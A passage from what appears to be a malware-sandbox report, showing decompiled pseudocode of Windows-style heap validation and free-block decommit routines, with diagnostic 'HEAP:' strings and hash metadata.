                    				unsigned int _t169;
                    				intOrPtr _t170;
                    				signed int* _t183;
                    				signed char _t184;
                    				intOrPtr _t191;
                    				signed int _t201;
                    				intOrPtr _t203;
                    				intOrPtr _t212;
                    				intOrPtr _t220;
                    				signed int _t230;
                    				signed int _t241;
                    				signed int _t244;
                    				void* _t259;
                    				signed int _t260;
                    				signed int* _t261;
                    				intOrPtr* _t262;
                    				signed int _t263;
                    				signed int* _t264;
                    				signed int _t267;
                    				signed int* _t268;
                    				void* _t270;
                    				void* _t281;
                    				signed short _t285;
                    				signed short _t289;
                    				signed int _t291;
                    				signed int _t298;
                    				signed char _t303;
                    				signed char _t308;
                    				signed int _t314;
                    				intOrPtr _t317;
                    				unsigned int _t319;
                    				signed int* _t325;
                    				signed int _t326;
                    				signed int _t327;
                    				intOrPtr _t328;
                    				signed int _t329;
                    				signed int _t330;
                    				signed int* _t331;
                    				signed int _t332;
                    				signed int _t350;
                    
                    				_t259 = __edx;
                    				_t331 = __ecx;
                    				_v28 = __ecx;
                    				_v20 = 0;
                    				_v12 = 0;
                    				_t150 = E017249A4(__ecx);
                    				_t267 = 1;
                    				if(_t150 == 0) {
                    					L61:
                    					_t151 =  *[fs:0x30];
                    					__eflags =  *((char*)(_t151 + 2));
                    					if( *((char*)(_t151 + 2)) != 0) {
                    						 *0x1756378 = _t267;
                    						asm("int3");
                    						 *0x1756378 = 0;
                    					}
                    					__eflags = _v12;
                    					if(_v12 != 0) {
                    						_t105 =  &_v16;
                    						 *_t105 = _v16 & 0x00000000;
                    						__eflags =  *_t105;
                    						E0169174B( &_v12,  &_v16, 0x8000);
                    					}
                    					L65:
                    					__eflags = 0;
                    					return 0;
                    				}
                    				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                    					_t268 =  &(_t331[0x30]);
                    					_v32 = 0;
                    					_t260 =  *_t268;
                    					_t308 = 0;
                    					_v24 = 0;
                    					while(_t268 != _t260) {
                    						_t260 =  *_t260;
                    						_v16 =  *_t325 & 0x0000ffff;
                    						_t156 = _t325[0];
                    						_v28 = _t325;
                    						_v5 = _t156;
                    						__eflags = _t156 & 0x00000001;
                    						if((_t156 & 0x00000001) != 0) {
                    							_t157 =  *[fs:0x30];
                    							__eflags =  *(_t157 + 0xc);
                    							if( *(_t157 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E0166B150();
                    							} else {
                    								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							_push(_t325);
                    							E0166B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                    							L32:
                    							_t270 = 0;
                    							__eflags = _t331[0x13];
                    							if(_t331[0x13] != 0) {
                    								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                    								 *_t325 =  *_t325 ^ _t331[0x14];
                    							}
                    							L60:
                    							_t267 = _t270 + 1;
                    							__eflags = _t267;
                    							goto L61;
                    						}
                    						_t169 =  *_t325 & 0x0000ffff;
                    						__eflags = _t169 - _t308;
                    						if(_t169 < _t308) {
                    							_t170 =  *[fs:0x30];
                    							__eflags =  *(_t170 + 0xc);
                    							if( *(_t170 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E0166B150();
                    							} else {
                    								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							E0166B150("Non-Dedicated free list element %p is out of order\n", _t325);
                    							goto L32;
                    						} else {
                    							__eflags = _t331[0x13];
                    							_t308 = _t169;
                    							_v24 = _t308;
                    							if(_t331[0x13] != 0) {
                    								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                    								 *_t325 =  *_t325 ^ _t331[0x14];
                    								__eflags =  *_t325;
                    							}
                    							_t26 =  &_v32;
                    							 *_t26 = _v32 + 1;
                    							__eflags =  *_t26;
                    							continue;
                    						}
                    					}
                    					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                    					if( *0x1756350 != 0 && _t331[0x2f] != 0) {
                    						_push(4);
                    						_push(0x1000);
                    						_push( &_v16);
                    						_push(0);
                    						_push( &_v12);
                    						_push(0xffffffff);
                    						if(E016A9660() >= 0) {
                    							_v20 = _v12 + 0x204;
                    						}
                    					}
                    					_t183 =  &(_t331[0x27]);
                    					_t281 = 0x81;
                    					_t326 =  *_t183;
                    					if(_t183 == _t326) {
                    						L49:
                    						_t261 =  &(_t331[0x29]);
                    						_t184 = 0;
                    						_t327 =  *_t261;
                    						_t282 = 0;
                    						_v24 = 0;
                    						_v36 = 0;
                    						__eflags = _t327 - _t261;
                    						if(_t327 == _t261) {
                    							L53:
                    							_t328 = _v32;
                    							_v28 = _t331;
                    							__eflags = _t328 - _t184;
                    							if(_t328 == _t184) {
                    								__eflags = _t331[0x1d] - _t282;
                    								if(_t331[0x1d] == _t282) {
                    									__eflags = _v12;
                    									if(_v12 == 0) {
                    										L82:
                    										_t267 = 1;
                    										__eflags = 1;
                    										goto L83;
                    									}
                    									_t329 = _t331[0x2f];
                    									__eflags = _t329;
                    									if(_t329 == 0) {
                    										L77:
                    										_t330 = _t331[0x22];
                    										__eflags = _t330;
                    										if(_t330 == 0) {
                    											L81:
                    											_t129 =  &_v16;
                    											 *_t129 = _v16 & 0x00000000;
                    											__eflags =  *_t129;
                    											E0169174B( &_v12,  &_v16, 0x8000);
                    											goto L82;
                    										}
                    										_t314 = _t331[0x21] & 0x0000ffff;
                    										_t285 = 1;
                    										__eflags = 1 - _t314;
                    										if(1 >= _t314) {
                    											goto L81;
                    										} else {
                    											goto L79;
                    										}
                    										while(1) {
                    											L79:
                    											_t330 = _t330 + 0x40;
                    											_t332 = _t285 & 0x0000ffff;
                    											_t262 = _v20 + _t332 * 4;
                    											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                    											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                    												break;
                    											}
                    											_t285 = _t285 + 1;
                    											__eflags = _t285 - _t314;
                    											if(_t285 < _t314) {
                    												continue;
                    											}
                    											goto L81;
                    										}
                    										_t191 =  *[fs:0x30];
                    										__eflags =  *(_t191 + 0xc);
                    										if( *(_t191 + 0xc) == 0) {
                    											_push("HEAP: ");
                    											E0166B150();
                    										} else {
                    											E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    										}
                    										_push(_t262);
                    										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                    										_t148 = _t330 + 0x10; // 0x10
                    										_push( *((intOrPtr*)(_t330 + 8)));
                    										E0166B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                    										L59:
                    										_t270 = 0;
                    										__eflags = 0;
                    										goto L60;
                    									}
                    									_t289 = 1;
                    									__eflags = 1;
                    									while(1) {
                    										_t201 = _v12;
                    										_t329 = _t329 + 0xc;
                    										_t263 = _t289 & 0x0000ffff;
                    										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                    										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                    											break;
                    										}
                    										_t289 = _t289 + 1;
                    										__eflags = _t289 - 0x81;
                    										if(_t289 < 0x81) {
                    											continue;
                    										}
                    										goto L77;
                    									}
                    									_t203 =  *[fs:0x30];
                    									__eflags =  *(_t203 + 0xc);
                    									if( *(_t203 + 0xc) == 0) {
                    										_push("HEAP: ");
                    										E0166B150();
                    									} else {
                    										E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    									}
                    									_t291 = _v12;
                    									_push(_t291 + _t263 * 4);
                    									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                    									_push( *((intOrPtr*)(_t329 + 8)));
                    									E0166B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                    									goto L59;
                    								}
                    								_t212 =  *[fs:0x30];
                    								__eflags =  *(_t212 + 0xc);
                    								if( *(_t212 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E0166B150();
                    								} else {
                    									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push(_t331[0x1d]);
                    								_push(_v36);
                    								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                    								L58:
                    								E0166B150();
                    								goto L59;
                    							}
                    							_t220 =  *[fs:0x30];
                    							__eflags =  *(_t220 + 0xc);
                    							if( *(_t220 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E0166B150();
                    							} else {
                    								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							_push(_t328);
                    							_push(_v24);
                    							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                    							goto L58;
                    						} else {
                    							goto L50;
                    						}
                    						while(1) {
                    							L50:
                    							_t92 = _t327 - 0x10; // -24
                    							_t282 = _t331;
                    							_t230 = E01724AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                    							__eflags = _t230;
                    							if(_t230 == 0) {
                    								goto L59;
                    							}
                    							_t327 =  *_t327;
                    							__eflags = _t327 - _t261;
                    							if(_t327 != _t261) {
                    								continue;
                    							}
                    							_t184 = _v24;
                    							_t282 = _v36;
                    							goto L53;
                    						}
                    						goto L59;
                    					} else {
                    						while(1) {
                    							_t39 = _t326 + 0x18; // 0x10
                    							_t264 = _t39;
                    							if(_t331[0x13] != 0) {
                    								_t319 = _t331[0x14] ^  *_t264;
                    								 *_t264 = _t319;
                    								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                    								_t348 = _t319 >> 0x18 - _t303;
                    								if(_t319 >> 0x18 != _t303) {
                    									_push(_t303);
                    									E0171FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                    								}
                    								_t281 = 0x81;
                    							}
                    							_t317 = _v20;
                    							if(_t317 != 0) {
                    								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                    								_t350 = _t241;
                    								if(_t350 != 0) {
                    									if(_t350 >= 0) {
                    										__eflags = _t241 & 0x00000800;
                    										if(__eflags == 0) {
                    											__eflags = _t241 - _t331[0x21];
                    											if(__eflags < 0) {
                    												_t298 = _t241;
                    												_t65 = _t317 + _t298 * 4;
                    												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                    												__eflags =  *_t65;
                    											}
                    										}
                    									} else {
                    										_t244 = _t241 & 0x00007fff;
                    										if(_t244 < _t281) {
                    											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                    										}
                    									}
                    								}
                    							}
                    							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E017123E3(_t331, _t264) == 0) {
                    								break;
                    							}
                    							if(_t331[0x13] != 0) {
                    								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                    								 *_t264 =  *_t264 ^ _t331[0x14];
                    							}
                    							_t326 =  *_t326;
                    							if( &(_t331[0x27]) == _t326) {
                    								goto L49;
                    							} else {
                    								_t281 = 0x81;
                    								continue;
                    							}
                    						}
                    						__eflags = _t331[0x13];
                    						if(_t331[0x13] != 0) {
                    							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                    							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                    						}
                    						goto L65;
                    					}
                    				} else {
                    					L83:
                    					return _t267;
                    				}
                    			}




























































                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                    • API String ID: 0-1357697941
                    • Opcode ID: 1e031b0e495d3cfcbc8157902f011f251988915490c65cf8774cfad7c1677b31
                    • Instruction ID: 9e9ea514b39c91e0d41da0c8bcf608b3ede9c1bc95c1435eec36e73a13daf789
                    • Opcode Fuzzy Hash: 1e031b0e495d3cfcbc8157902f011f251988915490c65cf8774cfad7c1677b31
                    • Instruction Fuzzy Hash: 84F13132610666EFDB25CF69C884BBAFBF6FF09304F148059E5879B641C770A986CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0168A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                    				char _v8;
                    				signed short _v12;
                    				signed short _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed short _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				unsigned int _v52;
                    				signed int _v56;
                    				void* _v60;
                    				intOrPtr _v64;
                    				void* _v72;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				unsigned int _t246;
                    				signed char _t247;
                    				signed short _t249;
                    				unsigned int _t256;
                    				signed int _t262;
                    				signed int _t265;
                    				signed int _t266;
                    				signed int _t267;
                    				intOrPtr _t270;
                    				signed int _t280;
                    				signed int _t286;
                    				signed int _t289;
                    				intOrPtr _t290;
                    				signed int _t291;
                    				signed int _t317;
                    				signed short _t320;
                    				intOrPtr _t327;
                    				signed int _t339;
                    				signed int _t344;
                    				signed int _t347;
                    				intOrPtr _t348;
                    				signed int _t350;
                    				signed int _t352;
                    				signed int _t353;
                    				signed int _t356;
                    				intOrPtr _t357;
                    				intOrPtr _t366;
                    				signed int _t367;
                    				signed int _t370;
                    				intOrPtr _t371;
                    				signed int _t372;
                    				signed int _t394;
                    				signed short _t402;
                    				intOrPtr _t404;
                    				intOrPtr _t415;
                    				signed int _t430;
                    				signed int _t433;
                    				signed int _t437;
                    				signed int _t445;
                    				signed short _t446;
                    				signed short _t449;
                    				signed short _t452;
                    				signed int _t455;
                    				signed int _t460;
                    				signed short* _t468;
                    				signed int _t480;
                    				signed int _t481;
                    				signed int _t483;
                    				intOrPtr _t484;
                    				signed int _t491;
                    				unsigned int _t506;
                    				unsigned int _t508;
                    				signed int _t513;
                    				signed int _t514;
                    				signed int _t521;
                    				signed short* _t533;
                    				signed int _t541;
                    				signed int _t543;
                    				signed int _t546;
                    				unsigned int _t551;
                    				signed int _t553;
                    
                    				_t450 = __ecx;
                    				_t553 = __ecx;
                    				_t539 = __edx;
                    				_v28 = 0;
                    				_v40 = 0;
                    				if(( *(__ecx + 0xcc) ^  *0x1758a68) != 0) {
                    					_push(_a4);
                    					_t513 = __edx;
                    					L11:
                    					_t246 = E0168A830(_t450, _t513);
                    					L7:
                    					return _t246;
                    				}
                    				if(_a8 != 0) {
                    					__eflags =  *(__edx + 2) & 0x00000008;
                    					if(( *(__edx + 2) & 0x00000008) != 0) {
                    						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                    						_t430 = E0168DF24(__edx,  &_v12,  &_v16);
                    						__eflags = _t430;
                    						if(_t430 != 0) {
                    							_t157 = _t553 + 0x234;
                    							 *_t157 =  *(_t553 + 0x234) - _v16;
                    							__eflags =  *_t157;
                    						}
                    					}
                    					_t445 = _a4;
                    					_t514 = _t539;
                    					_v48 = _t539;
                    					L14:
                    					_t247 =  *((intOrPtr*)(_t539 + 6));
                    					__eflags = _t247;
                    					if(_t247 == 0) {
                    						_t541 = _t553;
                    					} else {
                    						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                    						__eflags = _t541;
                    					}
                    					_t249 = 7 + _t445 * 8 + _t514;
                    					_v12 = _t249;
                    					__eflags =  *_t249 - 3;
                    					if( *_t249 == 3) {
                    						_v16 = _t514 + _t445 * 8 + 8;
                    						E01669373(_t553, _t514 + _t445 * 8 + 8);
                    						_t452 = _v16;
                    						_v28 =  *(_t452 + 0x10);
                    						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                    						_v36 =  *(_t452 + 0x14);
                    						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                    						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                    						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                    						_t256 =  *(_t452 + 0x14);
                    						__eflags = _t256 - 0x7f000;
                    						if(_t256 >= 0x7f000) {
                    							_t142 = _t553 + 0x1ec;
                    							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                    							__eflags =  *_t142;
                    							_t256 =  *(_t452 + 0x14);
                    						}
                    						_t513 = _v48;
                    						_t445 = _t445 + (_t256 >> 3) + 0x20;
                    						_a4 = _t445;
                    						_v40 = 1;
                    					} else {
                    						_t27 =  &_v36;
                    						 *_t27 = _v36 & 0x00000000;
                    						__eflags =  *_t27;
                    					}
                    					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                    					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                    						_v44 = _t513;
                    						_t262 = E0166A9EF(_t541, _t513);
                    						__eflags = _a8;
                    						_v32 = _t262;
                    						if(_a8 != 0) {
                    							__eflags = _t262;
                    							if(_t262 == 0) {
                    								goto L19;
                    							}
                    						}
                    						__eflags =  *0x1758748 - 1;
                    						if( *0x1758748 >= 1) {
                    							__eflags = _t262;
                    							if(_t262 == 0) {
                    								_t415 =  *[fs:0x30];
                    								__eflags =  *(_t415 + 0xc);
                    								if( *(_t415 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E0166B150();
                    								} else {
                    									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push("(UCRBlock != NULL)");
                    								E0166B150();
                    								__eflags =  *0x1757bc8;
                    								if( *0x1757bc8 == 0) {
                    									__eflags = 1;
                    									E01722073(_t445, 1, _t541, 1);
                    								}
                    								_t513 = _v48;
                    								_t445 = _a4;
                    							}
                    						}
                    						_t350 = _v40;
                    						_t480 = _t445 << 3;
                    						_v20 = _t480;
                    						_t481 = _t480 + _t513;
                    						_v24 = _t481;
                    						__eflags = _t350;
                    						if(_t350 == 0) {
                    							_t481 = _t481 + 0xfffffff0;
                    							__eflags = _t481;
                    						}
                    						_t483 = (_t481 & 0xfffff000) - _v44;
                    						__eflags = _t483;
                    						_v52 = _t483;
                    						if(_t483 == 0) {
                    							__eflags =  *0x1758748 - 1;
                    							if( *0x1758748 < 1) {
                    								goto L9;
                    							}
                    							__eflags = _t350;
                    							goto L146;
                    						} else {
                    							_t352 = E0169174B( &_v44,  &_v52, 0x4000);
                    							__eflags = _t352;
                    							if(_t352 < 0) {
                    								goto L94;
                    							}
                    							_t353 = E01687D50();
                    							_t447 = 0x7ffe0380;
                    							__eflags = _t353;
                    							if(_t353 != 0) {
                    								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    							} else {
                    								_t356 = 0x7ffe0380;
                    							}
                    							__eflags =  *_t356;
                    							if( *_t356 != 0) {
                    								_t357 =  *[fs:0x30];
                    								__eflags =  *(_t357 + 0x240) & 0x00000001;
                    								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                    									E017214FB(_t447, _t553, _v44, _v52, 5);
                    								}
                    							}
                    							_t358 = _v32;
                    							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                    							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                    							__eflags = _t484 - 0x7f000;
                    							if(_t484 >= 0x7f000) {
                    								_t90 = _t553 + 0x1ec;
                    								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                    								__eflags =  *_t90;
                    							}
                    							E01669373(_t553, _t358);
                    							_t486 = _v32;
                    							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                    							E01669819(_t486);
                    							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                    							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                    							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                    							__eflags = _t366 - 0x7f000;
                    							if(_t366 >= 0x7f000) {
                    								_t104 = _t553 + 0x1ec;
                    								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                    								__eflags =  *_t104;
                    							}
                    							__eflags = _v40;
                    							if(_v40 == 0) {
                    								_t533 = _v52 + _v44;
                    								_v32 = _t533;
                    								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                    								__eflags = _v24 - _v52 + _v44;
                    								if(_v24 == _v52 + _v44) {
                    									__eflags =  *(_t553 + 0x4c);
                    									if( *(_t553 + 0x4c) != 0) {
                    										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                    										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                    									}
                    								} else {
                    									_t449 = 0;
                    									_t533[3] = 0;
                    									_t533[1] = 0;
                    									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                    									_t491 = _t394;
                    									 *_t533 = _t394;
                    									__eflags =  *0x1758748 - 1; // 0x0
                    									if(__eflags >= 0) {
                    										__eflags = _t491 - 1;
                    										if(_t491 <= 1) {
                    											_t404 =  *[fs:0x30];
                    											__eflags =  *(_t404 + 0xc);
                    											if( *(_t404 + 0xc) == 0) {
                    												_push("HEAP: ");
                    												E0166B150();
                    											} else {
                    												E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    											}
                    											_push("((LONG)FreeEntry->Size > 1)");
                    											E0166B150();
                    											_pop(_t491);
                    											__eflags =  *0x1757bc8 - _t449; // 0x0
                    											if(__eflags == 0) {
                    												__eflags = 0;
                    												_t491 = 1;
                    												E01722073(_t449, 1, _t541, 0);
                    											}
                    											_t533 = _v32;
                    										}
                    									}
                    									_t533[1] = _t449;
                    									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                    									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                    										_t402 = (_t533 - _t541 >> 0x10) + 1;
                    										_v16 = _t402;
                    										__eflags = _t402 - 0xfe;
                    										if(_t402 >= 0xfe) {
                    											_push(_t491);
                    											_push(_t449);
                    											E0172A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                    											_t533 = _v48;
                    											_t402 = _v32;
                    										}
                    										_t449 = _t402;
                    									}
                    									_t533[3] = _t449;
                    									E0168A830(_t553, _t533,  *_t533 & 0x0000ffff);
                    									_t447 = 0x7ffe0380;
                    								}
                    							}
                    							_t367 = E01687D50();
                    							__eflags = _t367;
                    							if(_t367 != 0) {
                    								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    							} else {
                    								_t370 = _t447;
                    							}
                    							__eflags =  *_t370;
                    							if( *_t370 != 0) {
                    								_t371 =  *[fs:0x30];
                    								__eflags =  *(_t371 + 0x240) & 1;
                    								if(( *(_t371 + 0x240) & 1) != 0) {
                    									__eflags = E01687D50();
                    									if(__eflags != 0) {
                    										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    									}
                    									E01721411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                    								}
                    							}
                    							_t372 = E01687D50();
                    							_t546 = 0x7ffe038a;
                    							_t446 = 0x230;
                    							__eflags = _t372;
                    							if(_t372 != 0) {
                    								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    							} else {
                    								_t246 = 0x7ffe038a;
                    							}
                    							__eflags =  *_t246;
                    							if( *_t246 == 0) {
                    								goto L7;
                    							} else {
                    								__eflags = E01687D50();
                    								if(__eflags != 0) {
                    									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                    									__eflags = _t546;
                    								}
                    								_push( *_t546 & 0x000000ff);
                    								_push(_v36);
                    								_push(_v40);
                    								goto L120;
                    							}
                    						}
                    					} else {
                    						L19:
                    						_t31 = _t513 + 0x101f; // 0x101f
                    						_t455 = _t31 & 0xfffff000;
                    						_t32 = _t513 + 0x28; // 0x28
                    						_v44 = _t455;
                    						__eflags = _t455 - _t32;
                    						if(_t455 == _t32) {
                    							_t455 = _t455 + 0x1000;
                    							_v44 = _t455;
                    						}
                    						_t265 = _t445 << 3;
                    						_v24 = _t265;
                    						_t266 = _t265 + _t513;
                    						__eflags = _v40;
                    						_v20 = _t266;
                    						if(_v40 == 0) {
                    							_t266 = _t266 + 0xfffffff0;
                    							__eflags = _t266;
                    						}
                    						_t267 = _t266 & 0xfffff000;
                    						_v52 = _t267;
                    						__eflags = _t267 - _t455;
                    						if(_t267 < _t455) {
                    							__eflags =  *0x1758748 - 1; // 0x0
                    							if(__eflags < 0) {
                    								L9:
                    								_t450 = _t553;
                    								L10:
                    								_push(_t445);
                    								goto L11;
                    							}
                    							__eflags = _v40;
                    							L146:
                    							if(__eflags == 0) {
                    								goto L9;
                    							}
                    							_t270 =  *[fs:0x30];
                    							__eflags =  *(_t270 + 0xc);
                    							if( *(_t270 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E0166B150();
                    							} else {
                    								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							_push("(!TrailingUCR)");
                    							E0166B150();
                    							__eflags =  *0x1757bc8;
                    							if( *0x1757bc8 == 0) {
                    								__eflags = 0;
                    								E01722073(_t445, 1, _t541, 0);
                    							}
                    							L152:
                    							_t445 = _a4;
                    							L153:
                    							_t513 = _v48;
                    							goto L9;
                    						}
                    						_v32 = _t267;
                    						_t280 = _t267 - _t455;
                    						_v32 = _v32 - _t455;
                    						__eflags = _a8;
                    						_t460 = _v32;
                    						_v52 = _t460;
                    						if(_a8 != 0) {
                    							L27:
                    							__eflags = _t280;
                    							if(_t280 == 0) {
                    								L33:
                    								_t446 = 0;
                    								__eflags = _v40;
                    								if(_v40 == 0) {
                    									_t468 = _v44 + _v52;
                    									_v36 = _t468;
                    									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                    									__eflags = _v20 - _v52 + _v44;
                    									if(_v20 == _v52 + _v44) {
                    										__eflags =  *(_t553 + 0x4c);
                    										if( *(_t553 + 0x4c) != 0) {
                    											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                    											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                    										}
                    									} else {
                    										_t468[3] = 0;
                    										_t468[1] = 0;
                    										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                    										_t521 = _t317;
                    										 *_t468 = _t317;
                    										__eflags =  *0x1758748 - 1; // 0x0
                    										if(__eflags >= 0) {
                    											__eflags = _t521 - 1;
                    											if(_t521 <= 1) {
                    												_t327 =  *[fs:0x30];
                    												__eflags =  *(_t327 + 0xc);
                    												if( *(_t327 + 0xc) == 0) {
                    													_push("HEAP: ");
                    													E0166B150();
                    												} else {
                    													E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    												}
                    												_push("(LONG)FreeEntry->Size > 1");
                    												E0166B150();
                    												__eflags =  *0x1757bc8 - _t446; // 0x0
                    												if(__eflags == 0) {
                    													__eflags = 1;
                    													E01722073(_t446, 1, _t541, 1);
                    												}
                    												_t468 = _v36;
                    											}
                    										}
                    										_t468[1] = _t446;
                    										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                    										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                    										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                    											_t320 = _t446;
                    										} else {
                    											_t320 = (_t468 - _t541 >> 0x10) + 1;
                    											_v12 = _t320;
                    											__eflags = _t320 - 0xfe;
                    											if(_t320 >= 0xfe) {
                    												_push(_t468);
                    												_push(_t446);
                    												E0172A80D(_t522, 3, _t468, _t541);
                    												_t468 = _v52;
                    												_t320 = _v28;
                    											}
                    										}
                    										_t468[3] = _t320;
                    										E0168A830(_t553, _t468,  *_t468 & 0x0000ffff);
                    									}
                    								}
                    								E0168B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                    								E0168A830(_t553, _v64, _v24);
                    								_t286 = E01687D50();
                    								_t542 = 0x7ffe0380;
                    								__eflags = _t286;
                    								if(_t286 != 0) {
